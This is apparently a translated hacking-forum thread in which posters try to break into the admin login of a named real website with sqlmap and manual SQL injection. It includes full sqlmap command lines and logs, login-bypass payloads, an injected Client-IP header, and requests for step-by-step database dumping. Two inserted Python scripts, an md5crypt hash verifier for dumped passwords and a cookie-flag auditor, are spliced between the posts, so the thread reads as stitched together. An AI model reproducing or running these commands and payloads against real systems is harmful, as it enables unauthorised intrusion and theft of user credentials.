sqlmap dumps the passwords incorrectly, like this: $1$JJCSUHzQ$fJoUTRgTvE\\/6CsiTRtfFC, and each time it puts the slashes in different places. How can I fix this problem? It is an md5(unix) hash.
I'm using sqlmap to dump tables via POST. What really confuses me is that when you look by hand there is an error when you submit admin':
Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1
Or "user not found" if you submit:
Code:
    username=" or ""="&" or ""="=admin&login=1
sqlmap says completely different things. How do I dump a table, or at least log in as admin? And why doesn't sqlmap dump it with the standard options?
Code:
    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
    [sqlmap banner] {1.1.12#stable} http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting at 21:38:30
    [21:38:30] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060326 Firefox/1.5.0.3 (Debian-1.5.dfsg+1.5.0.3-2)'
    [21:38:31] [INFO] testing connection to the target URL
    [21:38:31] [INFO] testing if the target URL content is stable
    [21:38:32] [INFO] target URL content is stable
    [21:38:32] [INFO] testing if POST parameter 'username' is dynamic
    [21:38:32] [INFO] confirming that POST parameter 'username' is dynamic
    [21:38:32] [INFO] POST parameter 'username' is dynamic
    [21:38:32] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')
    [21:38:33] [INFO] testing for SQL injection on POST parameter 'username'
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    [21:38:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [21:38:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
    [21:38:46] [WARNING] reflective value(s) found and filtering out
    [21:38:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
    [21:39:07] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [21:39:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
    [21:39:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:39:56] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
    [21:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
    [21:40:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
    [21:40:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
    [21:40:36] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
    [21:40:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
    [21:40:38] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
    [21:40:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:39] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
    [21:40:40] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
    [21:40:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
    [21:40:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
    [21:41:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [21:41:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
    [21:41:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [21:41:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
    [21:41:33] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
    [21:41:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
    [21:41:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:41:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [21:42:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [21:42:35] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
    [21:42:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
    [21:42:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [21:43:03] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [21:43:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
    [21:43:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [21:43:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
    [21:43:04] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
    [21:43:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
    [21:43:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
    [21:43:06] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
    [21:43:06] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
    [21:43:06] [INFO] testing 'MySQL inline queries'
    [21:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
    [21:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [21:43:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
    [21:43:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
    [21:43:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
    [21:43:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [21:43:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
    [21:43:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
    [21:44:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
    [21:44:13] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (comment)' injectable
    [21:44:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [21:44:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [21:44:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [21:44:14] [INFO] target URL appears to have 5 columns in query
    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
    [21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
    [21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
    [21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
    [21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
    [21:45:08] [WARNING] false positive or unexploitable injection point detected
    [21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
    [21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
    [21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
    [21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable
Code:
    --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql -p username
or
Code:
    --data "username=admin*&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
It could be a WAF, or just an ordinary database error.
None of the options above worked, unfortunately. Interestingly, as an experiment I tried:
Code:
    --level=1 --risk=1 --banner -v 3 --union-cols=1-66 --dbms="MySQL" --technique=EBU --identify-waf --no-cast
which likewise did not work.
Maybe the problem isn't sqlmap? I would try running sqlmap from a different folder, from Kali Linux, or not sqlmap at all. If you get the same result everywhere, then sqlmap is not the problem.
Most likely it is not sqlmap that dumps "incorrectly"; it is the script in which the injection was found that escapes the slashes. Try checking the output by hand! Have you tried getting the result manually? Or do you only know how to work with an injection in the DB through sqlmap? sqlmap is not a panacea!
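The reply above says the backslashes come from the target script's escaping, not from sqlmap. The script below is an added example (not from the thread, not sqlmap code) that does what the original poster wanted: it strips the escaping from a dumped md5(unix) hash, checks that the result has the shape of a valid $1$ hash, and verifies a candidate password with a pure-Python md5crypt (same algorithm as FreeBSD's crypt(3) $1$ variant). The test password, the use of the salt JJCSUHzQ from the thread, and the assumption that every backslash in the dump is escaping noise (md5crypt output never contains one) are mine.

```python
"""Added example: normalise escaped md5crypt ($1$) hashes from a dump and verify
a candidate password against them. Not code from the thread or from sqlmap.

Assumption: any backslash in a dumped hash was inserted by the application's
escaping (e.g. addslashes), because a genuine md5crypt digest only uses the
characters ./0-9A-Za-z.
"""
import hashlib
import re

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# $1$ + salt (1..8 chars) + $ + 22-char digest
MD5CRYPT_RE = re.compile(r"^\$1\$([./0-9A-Za-z]{1,8})\$([./0-9A-Za-z]{22})$")


def unescape_dump(value: str) -> str:
    """Remove every run of backslashes; nothing else in a $1$ hash can be escaped."""
    return re.sub(r"\\+", "", value)


def is_valid_md5crypt(hash_str: str) -> bool:
    """True if the string has the exact shape of an md5crypt hash (after unescaping)."""
    return MD5CRYPT_RE.match(hash_str) is not None


def _to64(value: int, count: int) -> bytes:
    """md5crypt's base64 variant: 6 bits per char, least significant group first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD md5crypt: 1000 MD5 rounds over password/salt permutations."""
    magic = b"$1$"
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    plen = len(password)
    while plen > 0:                      # mix in alt, 16 bytes per 16 password bytes
        ctx.update(alt[: min(16, plen)])
        plen -= 16
    i = len(password)
    while i:                             # the odd/even bit dance on the length
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                # key stretching rounds
        rnd = hashlib.md5()
        rnd.update(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    encoded = b""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return (magic + salt + b"$" + encoded).decode()


def verify(password: str, dumped_hash: str) -> bool:
    """Unescape, validate the shape, recompute with the embedded salt and compare."""
    clean = unescape_dump(dumped_hash)
    m = MD5CRYPT_RE.match(clean)
    if not m:
        return False                     # wrong length or alphabet: the dump lost data
    return md5crypt(password.encode(), m.group(1).encode()) == clean


if __name__ == "__main__":
    # Constructed sample: hash "Secret123" with the salt seen in the thread, then
    # escape it the way the dump looked and check that verification still works.
    h = md5crypt(b"Secret123", b"JJCSUHzQ")
    dumped = h.replace("/", "\\\\/")
    print(dumped, "->", unescape_dump(dumped), verify("Secret123", dumped))
```

If the unescaped digest is not exactly 22 characters, the problem is no longer escaping: a character was lost in the dump itself, and the hash must be re-extracted (for example with --hex, as mentioned later in this thread) before any cracking attempt makes sense.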
I did. Of course I did! First I went through the login attempts, where it gave the message "user not found in the database". No syntax error appeared. Only the "username" field is vulnerable; "passwd" gives zero reaction.
Code:
    ' OR '1
    ' OR 1 -- -
    " OR "" = "
    " OR 1 = 1 -- -
    '='
    'LIKE'
    '=0--+
Then I tried to work out the tables with order by and manually with union+select+1,2,3-- and everywhere I ran into the error itself:
Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1
That is why the original question arises: why do I see the bug by hand but can't use it, while sqlmap also sees the bug at first and then says no, it's not a bug... or is it not sqlmap's fault here either.
Unfortunately, I'm not very good at doing it by hand. Could you explain step by step how to dump the database manually with this kind of vulnerability? POST data:
Code:
    sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20
I would be grateful.
PM me, or read https://forum.antichat.ru//threads/43966/. Use proper URL-encoding handling with --no-cast --hex --text-only; the charset can be specified, and different encodings also have an effect. With blind injection the timeouts matter too, and of course --drop-set-cookie --flush-session.
Code:
    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql
The heuristic analysis reported a vulnerability, but -v 3 said no. The same result with:
Code:
    root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --level=1 --risk=1 --banner -v 3 --union-cols=1-66 --dbms="MySQL" --technique=EBU --identify-waf --no-cast
I used these parameters not only on http://advert.kp.ru/admin//index.php but also on http://advert.kp.ru/admin//login.php. In the second case sqlmap told me right away that there was no vulnerability.
I pulled the DB, and when I type the command to list the tables it starts running the injection all over again. What the hell? This is the second time this has happened since I installed the latest version of sqlmap; it never did this before.
Friends, please advise. I found a vulnerability: "A cookie has been set without the secure flag, which means that the cookie can be accessed via unencrypted connections." How can this be exploited?
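The finding quoted above means the server sets a cookie without the Secure attribute, so a browser will also send it with plain http:// requests, where anyone on the path can read it. The script below is an added example, not from the thread, of the check a scanner performs and of the corrected header: it pulls every Set-Cookie header out of a raw HTTP response, reports which protective attributes (Secure, HttpOnly, SameSite) are missing, and produces the hardened header. The sample response, cookie names and values are constructed.

```python
"""Added example (not from the thread): audit Set-Cookie headers for the Secure
flag and related attributes, and emit the hardened header.

SAMPLE_RESPONSE is constructed; the cookie names and values are made up.
"""


def set_cookie_headers(raw_response: str) -> list:
    """Collect every Set-Cookie header value from a raw HTTP response (status line first)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            values.append(value.strip())
    return values


def audit_set_cookie(header_value: str) -> dict:
    """Return the cookie name and the list of protective attributes it lacks."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {p.partition("=")[0].strip().lower(): p.partition("=")[2].strip() for p in parts[1:]}
    missing = []
    if "secure" not in attrs:
        missing.append("Secure")        # the finding in the thread: sent over plain http:// too
    if "httponly" not in attrs:
        missing.append("HttpOnly")      # readable from document.cookie by injected script
    if "samesite" not in attrs:
        missing.append("SameSite")      # attached to cross-site requests
    return {"name": name, "missing": missing}


def harden_set_cookie(header_value: str) -> str:
    """Append the missing attributes; attributes already present are left unchanged."""
    fixes = {"Secure": "Secure", "HttpOnly": "HttpOnly", "SameSite": "SameSite=Lax"}
    result = header_value.rstrip("; ")
    for attr in audit_set_cookie(header_value)["missing"]:
        result += "; " + fixes[attr]
    return result


def audit_response(raw_response: str) -> dict:
    """Map each cookie name in a response to its missing attributes."""
    report = {}
    for header in set_cookie_headers(raw_response):
        finding = audit_set_cookie(header)
        report[finding["name"]] = finding["missing"]
    return report


# Constructed response: a session cookie with no flags next to a correctly set one.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Set-Cookie: lang=en; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for header in set_cookie_headers(SAMPLE_RESPONSE):
        print(audit_set_cookie(header), "->", harden_set_cookie(header))
```

Secure only stops the browser from sending the cookie over plaintext; it does not protect a session cookie that a script on the page can read (HttpOnly) or one that rides along on cross-site requests (SameSite), which is why the check reports all three together.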
What does the query for searching columns look like? I need a column named OTP; what would the search parameter look like?
This is the first time I've seen an SQL report like this. How do I write the request in SQLmap?
Code:
    GET / HTTP/1.1
    Referer: http://www.google.com/search?hl=en&q=testing
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
    Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
    X-Forwarded-For: 127.0.0.1
    X-Forwarded-Host: localhost
    Accept-Language: en
    Via: 1.1 wa.www.test.com
    Origin: http://www.test.com/
    X-Requested-With: XMLHttpRequest
    Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
    Host: site.com (this is the site I was checking)
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    Accept: */*